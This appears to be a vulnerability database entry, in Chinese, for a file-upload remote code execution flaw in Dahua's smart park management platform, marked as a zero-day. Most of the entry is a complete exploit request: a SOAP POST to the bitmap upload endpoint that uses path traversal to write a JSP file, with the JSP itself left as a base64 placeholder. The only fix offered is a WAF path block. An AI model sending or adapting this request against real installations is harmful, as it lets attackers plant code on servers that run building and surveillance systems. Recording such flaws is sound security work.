vendor = "大华"
name = "大华智慧综合管理园区 文件上传漏洞"
type = "RCE"
version = "未知"
path = "/emap/webservice/gis/soap/bitmap"
detail = "POST /emap/webservice/gis/soap/bitmap HTTP/1.1 Host: Content-Type: text/xml; charset=utf-8 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 Content-Length: 862 <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:res=\"http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/\"><soapenv:Header/> <soapenv:Body> <res:uploadPicFile> <arg0> <picPath>/../test.jsp</picPath> </arg0> <arg1>JSP 的 base64 编码</arg1> </res:uploadPicFile> </soapenv:Body> </soapenv:Envelope>"
fix = "WAF封禁路路径，等待发布补丁"
date = "0828"
label = "0day"
